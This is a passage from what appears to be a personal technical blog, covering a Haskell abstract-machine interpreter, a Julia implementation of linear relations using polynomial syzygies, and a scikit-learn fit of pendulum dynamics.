evald :: AExpr -> AHole -> Value
evald (Add x y) k = evald x (AddL y k)
evald (Lit i) k = apply k i

eval'' e = evald e IdDone

We can make this into more of a machine by inlining apply into evald and breaking up the tail recursion into individual steps. Now we have a step relation on a state consisting of continuation data AHole and program information AExpr. Every step makes progress towards evaluating the expression. If you squint a little, this machine is basically an RPN machine for evaluating arithmetic.

data Machine = Machine {  prog :: AExpr  , kont :: AHole}

step :: Machine -> Either Value Machine
step (Machine (Add x y) k) = Right $ Machine x (AddL y k)
step (Machine (Lit i) (AddL e k)) = Right $ Machine e (AddR i k)
step (Machine (Lit i) (AddR v k)) = Right $ Machine (Lit (i + v)) k
step (Machine (Lit i) (IdDone)) = Left i

init_machine e = Machine e IdDone

-- https://hackage.haskell.org/package/extra-1.7.4/docs/src/Control.Monad.Extra.html#loop
loop :: (a -> Either b a) -> a -> b
loop act x = case act x of
    Right x -> loop act x
    Left v -> v

eval'''' e = loop step (init_machine e)

Pretty neat right?

Artwork Courtesy of David

Now the next simplest steps in my opinion would be to add Booleans, Let expressions, and Print statements. Then after grokking that, I would attempt the CEK and Krivine Machines for lambda calculus.

Artwork Courtesy of David

Links

Defunctionalizing arithmetic can be found in https://www.brics.dk/RS/01/23/BRICS-RS-01-23.pdf – Defunctionalization at Work – Danvy and Nielson

https://homepages.inf.ed.ac.uk/wadler/papers/papers-we-love/reynolds-definitional-interpreters-1998.pdf Definitional Interpreters for Higher Order Programming Languages – Reynolds 1972. The grand daddy paper of defunctionalization

https://tidsskrift.dk/brics/article/download/21784/19215 – A Journey from Interpreters to Compilers and Virtual Machines – Mads Sig Ager, Dariusz Biernacki, Olivier Danvy,
Jan Midtgaard

http://www.pathsensitive.com/2019/07/the-best-refactoring-youve-never-heard.html Best Refactoring You’ve never Heard of by Jimmy Koppel.

Xavier Leroy abstract machine slides https://xavierleroy.org/mpri/2-4/

https://caml.inria.fr/pub/papers/xleroy-zinc.pdf – Leroy’s description of the Zinc Machine

CEK machine – Matt Might http://matt.might.net/articles/cek-machines/

https://github.com/rain-1/continuations-study-group/wiki/Reading-List

https://semantic-domain.blogspot.com/2020/02/thought-experiment-introductory.html Neel Krishnaswami’s hypothetical compiler course.

http://www.cs.nott.ac.uk/~pszgmh/ccc.pdf Calculating Correct Compilers – Bahr and Hutton

Checkpoint: Implementing Linear Relations for Linear Time Invariant Systems

I’m feeling a little stuck on this one so I think maybe it is smart to just write up a quick checkpoint for myself and anyone who might have advice.

The idea is to reimplement the ideas here computing linear relations https://www.philipzucker.com/linear-relation-algebra-of-circuits-with-hmatrix/ There is a lot more context written in that post and probably necessary background for this one.

Linear relations algebra is a refreshing perspective for me on systems of linear equations. It has a notion of composition that seems, dare I say, almost as useful as matrix multiplication. Very high praise. This composition has a more bidirectional flavor than matrix multiplication as it a good fit for describing physical systems, in which interconnection always influences both ways.

In the previous post, I used nullspace computations as my workhorse. The nullspace operation allows one to switch between a constraint (nullspace) and a generator (span) picture of a vector subspace. The generator view is useful for projection and linear union, and the constraint view is useful for partial-composition and intersection. The implementation of linear relation composition requires flipping between both views.

I’m reimplementing it in Julia for 2 reasons

  • To use the Julia ecosystems implementation of module operations
  • to get a little of that Catlab.jl magic to shine on it.

It was a disappointment of the previous post that I could only treat resistor-like circuits. The new twist of using module packages allows treatment of inductor/capacitor circuits and signal flow diagrams.

When you transform into Fourier space, systems of linear differential equations become systems of polynomial equations \frac{d}{dx} \rightarrow i \omega. From this perspective, modules seem like the appropriate abstraction rather vector spaces. Modules are basically vector spaces where one doesn’t assume the operation of scalar division, in other words the scalar are rings rather than fields. Polynomials are rings, not fields. In order to treat the new systems, I still need to be able to do linear algebraic-ish operations like nullspaces, except where the entries of the matrix are polynomials rather than floats.

Syzygies are basically the module analog of nullspaces. Syzygies are the combinations of generators that combine to zero. Considering the generators of a submodule as being column vectors, stacking them together makes a matrix. Taking linear combinations of the columns is what happens when you multiply a matrix by a vector. So the syzygies are the space of vectors for which this matrix multiplication gives 0, the “nullspace”.

Computer algebra packages offer syzygy computations. Julia has bindings to Singular, which does this. I have been having a significant and draining struggle to wrangle these libraries though. Am I going against the grain? Did the library authors go against the grain? Here’s what I’ve got trying to match the catlab naming conventions:

using Singular

import Nemo

using LinearAlgebra # : I

CC = Nemo.ComplexField(64)
P, (s,) = PolynomialRing(CC, ["s"])
i = Nemo.onei(CC) # P(i) ? The imaginary number

#helpers to deal with Singular.jl
eye(m) = P.(Matrix{Int64}(I, m, m)) # There is almost certainly a better way of doing this. Actually dispatching Matrix?
zayro(m,n) = P.(zeros(Int64,m,n)) #new zeros method?
mat1(m::Int64) = fill(P(m), (1,1) )
mat1(m::Float64) = fill(P(m), (1,1) )
mat1(m::spoly{Singular.n_unknown{Nemo.acb}}) = fill(m, (1,1))

# Objects are the dimensionality of the vector space
struct DynOb
    m::Int
end

# Linear relations represented 
struct DynMorph
  input::Array{spoly{Singular.n_unknown{Nemo.acb}},2}
  output::Array{spoly{Singular.n_unknown{Nemo.acb}},2}
end

dom(x::DynMorph) = DynOb(size(x.input)[2])
codom(x::DynMorph) = DynOb(size(x.output)[2])
id(X::DynOb) = DynMorph(eye(X.m), -eye(X.m))

# add together inputs
plus(X::DynOb) = DynMorph( [eye(X.m) eye(X.m)] , - eye(X.m) )


mcopy(X::DynOb) = Dyn( [eye(X.m) ; eye(X.m)] , -eye(2*X.m) ) # copy input

delete(A::DynOb) = DynMorph( fill(P.(0),(0,A.m)) , fill(P.(0),(0,0)) )   
create(A::DynOb) = DynMorph( fill(P.(0),(0,0)) , fill(P.(0),(0,A.m)) )
dagger(x::DynMorph) = DynMorph(x.output, x.input)

# cup and cap operators
dunit(A::DynOb) = compose(create(A), mcopy(A))
dcounit(A::DynOb) = compose(mmerge(A), delete(A))


scale(M) = DynMorph( mat1(M),mat1(-1))
diff =  scale(i*s) # differentiation = multiplying by i omega
integ = dagger(diff)
#cupboy = DynMorph( [mat1(1) mat1(-1)] , fill(P.(0),(1,0)) )
#capboy = transpose(cupboy)

#terminal

# relational operations
# The meet
# Inclusion

# I think this is a nullspace calculation?
# almost all the code is trying to work around Singular's interface to one i can understand
function quasinullspace(A)
   rows, cols = size(A)
   vs = Array(gens(Singular.FreeModule(P, rows)))
   q = [sum(A[:,i] .* vs) for i in 1:cols]
   M = Singular.Module(P,q...)
   S = Singular.Matrix(syz(M)) # syz is the only meat of the computation
   return Base.transpose([S[i,j] for j=1:Singular.ncols(S), i=1:Singular.nrows(S) ])
end

function compose(x::DynMorph,y::DynMorph) 
    nx, xi = size(x.input)
    nx1, xo = size(x.output)
    @assert nx1 == nx
    ny, yi = size(y.input)
    ny1, yo = size(y.output)
    @assert ny1 == ny
    A = [ x.input                x.output P.(zeros(Int64,nx,yo)) ;
          P.(zeros(Int64,ny,xi)) y.input  y.output    ]
    B = quasinullspace(A)
    projB = [B[1:xi       ,:] ;
             B[xi+yi+1:end,:] ]
    C = Base.transpose(quasinullspace(Base.transpose(projB)))
    return DynMorph( C[:, 1:xi] ,C[:,xi+1:end] )
end

# basically the direct sum. The monoidal product of linear relations
function otimes( x::DynMorph, y::DynMorph) 
    nx, xi = size(x.input)
    nx1, xo = size(x.output)
    @assert nx1 == nx
    ny, yi = size(y.input)
    ny1, yo = size(y.output)
    @assert ny1 == ny
    return DynMorph( [ x.input                P.(zeros(Int64,nx,yi));
                       P.(zeros(Int64,ny,xi)) y.input               ],
                      [x.output                P.(zeros(Int64,nx,yo));
                       P.(zeros(Int64,ny,xo))  y.output               ])
    
end

I think this does basically work but it’s clunky.

Thoughts

I need to figure out Catlab’s diagram drawing abilities enough to show some circuits and some signal flow diagrams. Wouldn’t that be nice?

I should show concrete examples of composing passive filter circuits together.

There is a really fascinating paper by Jan Willems where he digs into a beautiful picture of this that I need to revisit https://homes.esat.kuleuven.be/~sistawww/smc/jwillems/Articles/JournalArticles/2007.1.pdf

https://golem.ph.utexas.edu/category/2018/06/the_behavioral_approach_to_sys.html

Is all this module stuff stupid? Should I just use rational polynomials and be done with it? Sympy? \frac{d^2}{dx^2}y = 0 and \frac{d}{dx}y = 0 are different equations, describing different behaviors. Am I even capturing that though? Is my syzygy powered composition even right? It seemed to work on a couple small examples and I think it makes sense. I dunno. Open to comments.

Because univariate polynomials are a principal ideal domain (pid), we can also use smith forms rather than syzygies is my understanding. Perhaps AbstractAlgebra.jl might be a better tool?

Will the syzygy thing be good for band theory? We’re in the multivariate setting then so smith normal form no longer applies.

System Identification of a Pendulum with scikit-learn

System identification is the name of the problem of finding the dynamics of a physical system. It is an old topic. For some interesting material on system identification, check out Steve Brunton’s video here https://www.youtube.com/watch?v=6F2YVsT9dOs

We’ve been building a raspberry pi controlled pendulum to be controlled from the internet and the problem came up of trying to get a simulation to match the physical pendulum.

Look at ‘er go. Energy shaping for the win.

We weighed the pendulum and calculated the torque due to gravity mg\frac{l}{2} \sin(\theta) (you can think of it as the full force of gravity acting on the level arm of the center of the pole \frac{l}{2}\sin(\theta)) and moment of inertia of a rod about it’s end \frac{1}{3}m L^2.

However, It is difficult to estimate the torque supplied by the motor. Motors have surprisingly complicated behavior. It is also difficult from first principles to estimate damping or friction terms.

There are a couple different experimental stratagems for a pendulum. One thing we tried was setting the pendulum on it’s side and setting the motor duty cycle to different values. From this you can fit a parabola to those curves and get a acceleration constant for the different motor settings. Experimentally speaking, it seemed roughly linear acceleration to motor PWM duty cycle.

Another stratagem is to take resonance curves for the pendulum. Try exciting it with different sinusoidal torques at a sweep of frequencies. From this curve you can recover a resonance frequency and damping coefficients.

These all make sense as kind of ersatz methods. We’re taking our intuitive understanding of the system and other results from simpler or related systems and combining them together.

An interesting alternative approach to the above is to drive the pendulum with a random torque and then fit a parameterized model of the equations of motion to the observed acceleration. The model should include at the least the gravity \beta_1 sin(\theta) term, motor torque term \beta_2 u, and a damping terms \beta_3 \dot{\theta}. A simple start is \alpha = \beta_1 sin(\theta) + \beta_2 u + \beta_3 \dot{\theta} . This is a linear model with respect to the coefficients \beta_i and can be solved by least squares.

I’ve come to appreciate sci-kit learn for fitting. It doesn’t have the hottest most high falutin’ fads, but it’s got a lot of good algorithms in it that just work, are damn easy to use, and are easy to swap different possibilities out of there. Even though I know how to more manually set up a least squares system or solve a LASSO problem via cvxpy, it makes it really easy and clean. I’ve started reaching for it for fast attacks on fitting problems.

We mocked out our interface to behave similarly to an OpenAI gym interface. Because of this, the observations already have the cosine and sine terms that might be of interest and the angular velocity value that would be used for a simple damping term \beta \dot{\theta}.



import gym
import time
import numpy as np
env = gym.make('pendulum-v0')
observation = env.reset()

action = 0
dt = 0.05
obs = []
rews = []
actions = []
for i in range(1000):

    # A random walk for actions.
    # we need the actions to be slow changing enough to see trends
    # but fast enough to see interesting behavior
    # tune this by hand 
    action += np.random.randn() * dt
    action = max( min(action, 2 ), -2) 
    observation, reward, done, info = env.step([action])
    obs.append(observation)
    actions.append(action)
    rews.append(reward)
    time.sleep(0.05)


obs = np.array(obs) # obs includes thetadot, cos(theta), sin(theta). A good start.
actions = np.array(actions) # the pwm value used

# data to predict alpha from. Each row is a data point from one time step.
X = np.hstack( (obs[:-1, :] , actions[:-1].reshape(-1,1)) ) 

alphas = (obs[1:,2] - obs[:-1,2]  ) / dt  #angular acceleration

# feel free to swap in LASSO or other regressors
from sklearn.linear_model import LinearRegression 


# fit the observed angular acceleration as a function of X
reg = LinearRegression().fit(X, alphas)
print(f"intercept : {reg.intercept_},  coeffs : {reg.coef_} ")

The number that came out for gravity term matched the number calculated from first principles by within 10%. Not bad!

A thing that is nice about this approach is that one is able to add terms into the dynamics for which we don’t have good intuitive models to compare to like your good ole Physics I Coulombic friction term F \propto -sign(v)  or nonlinearities.